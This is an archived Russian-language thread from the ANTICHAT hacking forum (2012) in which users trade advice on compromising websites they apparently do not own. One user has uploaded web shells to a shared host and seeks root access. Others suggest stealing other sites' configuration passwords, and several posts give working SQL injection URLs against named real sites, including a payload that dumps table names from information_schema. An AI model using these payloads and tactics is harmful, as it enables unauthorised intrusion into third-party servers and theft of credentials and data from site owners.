ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.02.2012, 13:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
3622
Репутация:
0
|
|
Сообщение от M_script
M_script said:
muljtik
, найди на сайтах папки с правами на запись и выполнение, залей туда шеллы.
Если крупные сайты, можно поискать баги в скриптах.
Да, на некоторых доменах в не которые папки есть возможность залить шелл, но всё равно когда захожу на только что залитый шелл им нельзя править индексную страницу...
хочу получить полный доступ к серверу но не знаю как, выполнил пару команд
$ uname -a
Linux cpanel12.per.syra.net.au 2.6.18-274.7.1.el5 #1 SMP Thu Oct 20 16:21:01 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/redhat-release
CentOS release 5.7 (Final)
поискал сплойт на exploit-db.com, без успешно
|
|
|
|
04.02.2012, 14:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
2muljtik,
2.6.18-274.7.1.el5
под него нет пока сплойтов(мб и есть).
Попробуй прочитать конфиги других сайтов, узнать пароль и уже из админки тех сайтов заливать шелл.
|
|
|
|
04.02.2012, 14:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
3622
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
Попробуй прочитать конфиги других сайтов, узнать пароль и уже из админки тех сайтов заливать шелл.
будет ли разница если я залью шелл через админку или через шелл на другом сайте найду папку с правами на загрузку файлов и залью туда другой шелл
|
|
|
|
04.02.2012, 14:21
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
Сообщение от muljtik
muljtik said:
будет ли разница если я залью шелл через админку или через шелл на другом сайте найду папку с правами на загрузку файлов и залью туда другой шелл
да нет смысла лить шеллы....только рутать, чего невозможно...
|
|
|
04.02.2012, 14:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от muljtik
muljtik said:
будет ли разница если я залью шелл через админку или через шелл на другом сайте найду папку с правами на загрузку файлов и залью туда другой шелл
Бывали случаи... Иногда льется не под 80/apache.
|
|
|
|
05.02.2012, 01:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
http://esus.ru/php/content.php?id=2775+union+select+1,2,3,4,5,6,7,8,9 ,10,1,2,3,4,5,6,7,8,9--
помогите вывести столбцы, или это blind?? хотя хавидж не определил что блайнд поэтому и обращяюсь
|
|
|
|
05.02.2012, 02:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
45485
Репутация:
1
|
|
Сообщение от pirat0
pirat0 said:
http://esus.ru/php/content.php?id=2775+union+select+1,2,3,4,5,6,7,8,9 ,10,1,2,3,4,5,6,7,8,9--
помогите вывести столбцы, или это blind?? хотя хавидж не определил что блайнд поэтому и обращяюсь
это слепая инъекция.
|
|
|
|
05.02.2012, 02:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
Сообщение от kravch_v
kravch_v said:
это слепая инъекция.
ах, точняк сиптом погнал, поспешил с вопросом, спс
|
|
|
|
05.02.2012, 16:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Такой вопрос, подобрал столбцы, версию и тп выыводит нормально, при попытке вывести данние таблиц выводит ошибку
Сообщение от None
http://www.europeeye.ro/detalii?id=7+union+select+1,2,3,table_name,5,6+fro m+information_schema.tables+limit+0,1--+
почему? |
|
|
|
05.02.2012, 17:13
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
Code:
http://www.europeeye.ro/detalii?id=7+union+select+1,unhex(hex(table_name)),3,4,5,6+from+information_schema.tables+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
